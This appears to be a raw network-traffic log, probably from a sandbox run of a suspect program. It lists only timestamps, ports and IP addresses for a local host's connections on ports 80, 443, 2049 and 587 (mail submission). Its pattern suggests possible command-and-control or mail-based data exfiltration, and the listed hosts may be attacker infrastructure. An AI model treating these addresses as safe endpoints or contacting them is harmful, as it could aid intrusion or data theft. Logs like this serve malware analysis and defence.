Oct 20, 2024 18:41:13.186177015 CEST	49731	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:13.192239046 CEST	80	49731	54.244.188.177	192.168.2.4
Oct 20, 2024 18:41:13.192336082 CEST	49731	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:13.221638918 CEST	49733	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:13.226582050 CEST	80	49733	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:13.226741076 CEST	49733	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:13.227921963 CEST	49733	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:13.228003979 CEST	49733	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:13.232841969 CEST	80	49733	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:13.232871056 CEST	80	49733	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:13.251478910 CEST	443	49730	104.26.12.205	192.168.2.4
Oct 20, 2024 18:41:13.251549006 CEST	443	49730	104.26.12.205	192.168.2.4
Oct 20, 2024 18:41:13.251668930 CEST	49730	443	192.168.2.4	104.26.12.205
Oct 20, 2024 18:41:13.269366980 CEST	49730	443	192.168.2.4	104.26.12.205
Oct 20, 2024 18:41:13.269392967 CEST	443	49730	104.26.12.205	192.168.2.4
Oct 20, 2024 18:41:13.274961948 CEST	49734	443	192.168.2.4	104.26.12.205
Oct 20, 2024 18:41:13.274983883 CEST	443	49734	104.26.12.205	192.168.2.4
Oct 20, 2024 18:41:13.275226116 CEST	49734	443	192.168.2.4	104.26.12.205
Oct 20, 2024 18:41:13.275492907 CEST	49734	443	192.168.2.4	104.26.12.205
Oct 20, 2024 18:41:13.275506020 CEST	443	49734	104.26.12.205	192.168.2.4
Oct 20, 2024 18:41:14.021341085 CEST	80	49732	54.244.188.177	192.168.2.4
Oct 20, 2024 18:41:14.021446943 CEST	49732	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:14.053567886 CEST	443	49734	104.26.12.205	192.168.2.4
Oct 20, 2024 18:41:14.060121059 CEST	49734	443	192.168.2.4	104.26.12.205
Oct 20, 2024 18:41:14.060148954 CEST	443	49734	104.26.12.205	192.168.2.4
Oct 20, 2024 18:41:14.138267040 CEST	49732	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:14.143718958 CEST	80	49732	54.244.188.177	192.168.2.4
Oct 20, 2024 18:41:14.196415901 CEST	49735	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:14.202349901 CEST	80	49735	54.244.188.177	192.168.2.4
Oct 20, 2024 18:41:14.202477932 CEST	49735	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:14.202733994 CEST	49735	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:14.202769995 CEST	49735	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:14.208137989 CEST	80	49735	54.244.188.177	192.168.2.4
Oct 20, 2024 18:41:14.208256960 CEST	80	49735	54.244.188.177	192.168.2.4
Oct 20, 2024 18:41:14.302562952 CEST	443	49734	104.26.12.205	192.168.2.4
Oct 20, 2024 18:41:14.302611113 CEST	443	49734	104.26.12.205	192.168.2.4
Oct 20, 2024 18:41:14.302660942 CEST	49734	443	192.168.2.4	104.26.12.205
Oct 20, 2024 18:41:14.302936077 CEST	49734	443	192.168.2.4	104.26.12.205
Oct 20, 2024 18:41:14.302970886 CEST	443	49734	104.26.12.205	192.168.2.4
Oct 20, 2024 18:41:14.647927999 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:14.653101921 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:14.653172970 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:14.662801027 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:14.667810917 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:14.767872095 CEST	80	49733	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:14.768032074 CEST	49733	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:14.778278112 CEST	49733	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:14.783195972 CEST	80	49733	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:14.809077978 CEST	49737	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:14.814176083 CEST	80	49737	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:14.814258099 CEST	49737	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:14.814536095 CEST	49737	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:14.814616919 CEST	49737	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:14.819521904 CEST	80	49737	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:14.819806099 CEST	80	49737	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:15.147489071 CEST	80	49735	54.244.188.177	192.168.2.4
Oct 20, 2024 18:41:15.158186913 CEST	49735	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:15.163661957 CEST	80	49735	54.244.188.177	192.168.2.4
Oct 20, 2024 18:41:15.163772106 CEST	49735	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:15.324470043 CEST	49738	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:15.329639912 CEST	80	49738	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:15.329776049 CEST	49738	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:15.329910040 CEST	49738	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:15.329967022 CEST	49738	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:15.334995031 CEST	80	49738	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:15.335153103 CEST	80	49738	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:15.515875101 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:15.570147038 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:15.575217962 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:15.786812067 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:15.844975948 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:16.371670961 CEST	80	49737	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:16.371997118 CEST	49737	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:16.396953106 CEST	49737	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:16.402151108 CEST	80	49737	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:16.898844004 CEST	80	49738	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:16.900676966 CEST	49738	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:17.002315044 CEST	49738	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:17.007611990 CEST	80	49738	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:17.019697905 CEST	49739	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:17.025432110 CEST	80	49739	54.244.188.177	192.168.2.4
Oct 20, 2024 18:41:17.025722027 CEST	49739	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:17.027776003 CEST	49739	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:17.027801991 CEST	49739	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:17.038495064 CEST	80	49739	54.244.188.177	192.168.2.4
Oct 20, 2024 18:41:17.038651943 CEST	80	49739	54.244.188.177	192.168.2.4
Oct 20, 2024 18:41:17.039911032 CEST	49740	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:17.044881105 CEST	80	49740	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:17.044945955 CEST	49740	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:17.046343088 CEST	49740	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:17.046380043 CEST	49740	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:17.051632881 CEST	80	49740	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:17.051702976 CEST	80	49740	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:17.086374998 CEST	49741	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:17.091662884 CEST	587	49741	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:17.091789007 CEST	49741	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:17.974503994 CEST	80	49739	54.244.188.177	192.168.2.4
Oct 20, 2024 18:41:17.974560022 CEST	49739	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:17.974697113 CEST	49739	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:17.979614973 CEST	80	49739	54.244.188.177	192.168.2.4
Oct 20, 2024 18:41:17.984668970 CEST	49743	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:17.989753008 CEST	80	49743	54.244.188.177	192.168.2.4
Oct 20, 2024 18:41:17.989818096 CEST	49743	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:17.991776943 CEST	49743	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:17.991797924 CEST	49743	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:17.997222900 CEST	80	49743	54.244.188.177	192.168.2.4
Oct 20, 2024 18:41:17.997262955 CEST	80	49743	54.244.188.177	192.168.2.4
Oct 20, 2024 18:41:18.250854015 CEST	587	49741	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:18.253952026 CEST	49741	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:18.258918047 CEST	587	49741	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:18.556612015 CEST	587	49741	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:18.556895018 CEST	49741	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:18.561954021 CEST	587	49741	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:18.584311008 CEST	80	49740	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:18.588797092 CEST	49740	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:18.590769053 CEST	49740	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:41:18.595602036 CEST	80	49740	18.141.10.107	192.168.2.4
Oct 20, 2024 18:41:18.653682947 CEST	49744	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:18.658845901 CEST	80	49744	54.244.188.177	192.168.2.4
Oct 20, 2024 18:41:18.658950090 CEST	49744	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:18.659461975 CEST	49744	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:18.659502029 CEST	49744	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:18.664611101 CEST	80	49744	54.244.188.177	192.168.2.4
Oct 20, 2024 18:41:18.664995909 CEST	80	49744	54.244.188.177	192.168.2.4
Oct 20, 2024 18:41:18.860172987 CEST	587	49741	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:18.860529900 CEST	49741	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:18.865478039 CEST	587	49741	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:18.948585987 CEST	80	49743	54.244.188.177	192.168.2.4
Oct 20, 2024 18:41:18.948762894 CEST	49743	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:18.957123041 CEST	49743	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:18.962069988 CEST	80	49743	54.244.188.177	192.168.2.4
Oct 20, 2024 18:41:19.069668055 CEST	49745	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:41:19.075015068 CEST	80	49745	44.221.84.105	192.168.2.4
Oct 20, 2024 18:41:19.078679085 CEST	49745	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:41:19.078810930 CEST	49745	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:41:19.078820944 CEST	49745	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:41:19.083832026 CEST	80	49745	44.221.84.105	192.168.2.4
Oct 20, 2024 18:41:19.084198952 CEST	80	49745	44.221.84.105	192.168.2.4
Oct 20, 2024 18:41:19.170648098 CEST	587	49741	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:19.170692921 CEST	587	49741	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:19.170710087 CEST	587	49741	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:19.170774937 CEST	49741	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:19.201142073 CEST	49741	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:19.206294060 CEST	587	49741	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:19.504528046 CEST	587	49741	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:19.546550035 CEST	49741	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:19.551744938 CEST	587	49741	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:19.609338999 CEST	80	49744	54.244.188.177	192.168.2.4
Oct 20, 2024 18:41:19.611824989 CEST	49744	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:19.702348948 CEST	49744	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:19.707254887 CEST	80	49744	54.244.188.177	192.168.2.4
Oct 20, 2024 18:41:19.737370014 CEST	49747	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:19.742480993 CEST	80	49747	54.244.188.177	192.168.2.4
Oct 20, 2024 18:41:19.742552042 CEST	49747	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:19.745899916 CEST	49747	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:19.746212006 CEST	49747	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:19.750843048 CEST	80	49747	54.244.188.177	192.168.2.4
Oct 20, 2024 18:41:19.751219034 CEST	80	49747	54.244.188.177	192.168.2.4
Oct 20, 2024 18:41:19.851489067 CEST	587	49741	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:19.864742994 CEST	49741	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:19.869859934 CEST	587	49741	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:19.961484909 CEST	80	49745	44.221.84.105	192.168.2.4
Oct 20, 2024 18:41:19.961555958 CEST	49745	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:41:19.962599039 CEST	49745	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:41:19.967483997 CEST	80	49745	44.221.84.105	192.168.2.4
Oct 20, 2024 18:41:19.981705904 CEST	49748	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:41:19.986685038 CEST	80	49748	44.221.84.105	192.168.2.4
Oct 20, 2024 18:41:19.986798048 CEST	49748	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:41:19.987498999 CEST	49748	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:41:19.987515926 CEST	49748	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:41:19.993334055 CEST	80	49748	44.221.84.105	192.168.2.4
Oct 20, 2024 18:41:19.993444920 CEST	80	49748	44.221.84.105	192.168.2.4
Oct 20, 2024 18:41:20.167911053 CEST	587	49741	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:20.168256044 CEST	49741	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:20.173315048 CEST	587	49741	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:20.490770102 CEST	587	49741	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:20.491081953 CEST	49741	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:20.496383905 CEST	587	49741	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:20.709523916 CEST	80	49747	54.244.188.177	192.168.2.4
Oct 20, 2024 18:41:20.709593058 CEST	49747	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:20.712933064 CEST	49747	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:41:20.718060970 CEST	80	49747	54.244.188.177	192.168.2.4
Oct 20, 2024 18:41:20.794759989 CEST	587	49741	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:20.795033932 CEST	49741	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:20.796358109 CEST	49751	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:41:20.799964905 CEST	587	49741	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:20.801490068 CEST	80	49751	44.221.84.105	192.168.2.4
Oct 20, 2024 18:41:20.801692009 CEST	49751	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:41:20.801692009 CEST	49751	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:41:20.801692963 CEST	49751	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:41:20.806782961 CEST	80	49751	44.221.84.105	192.168.2.4
Oct 20, 2024 18:41:20.807142019 CEST	80	49751	44.221.84.105	192.168.2.4
Oct 20, 2024 18:41:20.895056009 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:20.900530100 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:20.954052925 CEST	49751	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:41:21.101789951 CEST	587	49741	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:21.102040052 CEST	49741	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:21.104511976 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:21.104548931 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:21.104562998 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:21.104640961 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:21.104681015 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:21.104696989 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:21.104724884 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:21.106638908 CEST	49752	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:41:21.106909990 CEST	587	49741	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:21.111534119 CEST	80	49752	44.221.84.105	192.168.2.4
Oct 20, 2024 18:41:21.111640930 CEST	49752	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:41:21.111819983 CEST	49752	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:41:21.111819983 CEST	49752	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:41:21.116921902 CEST	80	49752	44.221.84.105	192.168.2.4
Oct 20, 2024 18:41:21.117012024 CEST	80	49752	44.221.84.105	192.168.2.4
Oct 20, 2024 18:41:21.156749010 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:21.158116102 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:21.258578062 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:21.348285913 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:21.353622913 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:21.411741018 CEST	587	49741	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:21.412513018 CEST	49741	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:21.412513018 CEST	49741	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:21.412597895 CEST	49741	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:21.412597895 CEST	49741	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:21.417530060 CEST	587	49741	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:21.417567015 CEST	587	49741	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:21.417805910 CEST	587	49741	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:21.417897940 CEST	587	49741	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:21.555507898 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:21.558226109 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:21.563287973 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:21.720521927 CEST	587	49741	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:21.765352964 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:21.812921047 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:21.901765108 CEST	49741	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:21.907004118 CEST	587	49741	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:21.943828106 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:21.949027061 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:21.949058056 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:21.949084997 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:21.949111938 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:21.949114084 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:21.949249983 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:21.949279070 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:21.949306011 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:21.949331999 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:21.949358940 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:21.949384928 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:21.949412107 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:21.954042912 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:21.954071045 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:21.954097033 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:21.954719067 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:21.993211031 CEST	80	49752	44.221.84.105	192.168.2.4
Oct 20, 2024 18:41:21.994196892 CEST	49752	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:41:22.051873922 CEST	49752	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:41:22.057988882 CEST	80	49752	44.221.84.105	192.168.2.4
Oct 20, 2024 18:41:22.170016050 CEST	49753	80	192.168.2.4	172.234.222.143
Oct 20, 2024 18:41:22.176001072 CEST	80	49753	172.234.222.143	192.168.2.4
Oct 20, 2024 18:41:22.176084995 CEST	49753	80	192.168.2.4	172.234.222.143
Oct 20, 2024 18:41:22.186930895 CEST	49753	80	192.168.2.4	172.234.222.143
Oct 20, 2024 18:41:22.186969995 CEST	49753	80	192.168.2.4	172.234.222.143
Oct 20, 2024 18:41:22.192308903 CEST	80	49753	172.234.222.143	192.168.2.4
Oct 20, 2024 18:41:22.192888975 CEST	80	49753	172.234.222.143	192.168.2.4
Oct 20, 2024 18:41:22.205104113 CEST	587	49741	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:22.209507942 CEST	49741	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:22.210417032 CEST	49754	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:22.215702057 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:22.215809107 CEST	49754	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:22.242891073 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:22.297308922 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:22.983002901 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:22.988018990 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:23.072611094 CEST	80	49753	172.234.222.143	192.168.2.4
Oct 20, 2024 18:41:23.073493958 CEST	49753	80	192.168.2.4	172.234.222.143
Oct 20, 2024 18:41:23.073760986 CEST	49753	80	192.168.2.4	172.234.222.143
Oct 20, 2024 18:41:23.079215050 CEST	80	49753	172.234.222.143	192.168.2.4
Oct 20, 2024 18:41:23.165673971 CEST	49757	80	192.168.2.4	172.234.222.143
Oct 20, 2024 18:41:23.171813011 CEST	80	49757	172.234.222.143	192.168.2.4
Oct 20, 2024 18:41:23.171883106 CEST	49757	80	192.168.2.4	172.234.222.143
Oct 20, 2024 18:41:23.171994925 CEST	49757	80	192.168.2.4	172.234.222.143
Oct 20, 2024 18:41:23.172012091 CEST	49757	80	192.168.2.4	172.234.222.143
Oct 20, 2024 18:41:23.177012920 CEST	80	49757	172.234.222.143	192.168.2.4
Oct 20, 2024 18:41:23.177026033 CEST	80	49757	172.234.222.143	192.168.2.4
Oct 20, 2024 18:41:23.211617947 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:23.211741924 CEST	49754	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:23.216747046 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:23.258055925 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:23.312916994 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:23.384051085 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:23.389170885 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:23.526424885 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:23.526572943 CEST	49754	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:23.531691074 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:23.590926886 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:23.599940062 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:23.605061054 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:23.806109905 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:23.810493946 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:23.815443993 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:23.828897953 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:23.830679893 CEST	49754	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:23.835474968 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:23.933244944 CEST	80	49748	44.221.84.105	192.168.2.4
Oct 20, 2024 18:41:23.933717012 CEST	49748	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:41:23.933854103 CEST	49748	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:41:23.938612938 CEST	80	49748	44.221.84.105	192.168.2.4
Oct 20, 2024 18:41:23.964760065 CEST	49758	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:41:23.970596075 CEST	80	49758	172.234.222.138	192.168.2.4
Oct 20, 2024 18:41:23.970669985 CEST	49758	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:41:23.970784903 CEST	49758	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:41:23.970807076 CEST	49758	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:41:23.975632906 CEST	80	49758	172.234.222.138	192.168.2.4
Oct 20, 2024 18:41:23.975831032 CEST	80	49758	172.234.222.138	192.168.2.4
Oct 20, 2024 18:41:24.020406008 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.062926054 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.073090076 CEST	80	49757	172.234.222.143	192.168.2.4
Oct 20, 2024 18:41:24.074842930 CEST	49757	80	192.168.2.4	172.234.222.143
Oct 20, 2024 18:41:24.075151920 CEST	49757	80	192.168.2.4	172.234.222.143
Oct 20, 2024 18:41:24.080106020 CEST	80	49757	172.234.222.143	192.168.2.4
Oct 20, 2024 18:41:24.109519958 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.115092039 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.115122080 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.115149021 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.115223885 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.115422964 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.115452051 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.115475893 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.115480900 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.115500927 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.115509033 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.115525961 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.115535975 CEST	2049	49736	212.162.149.53	192.168.2.4
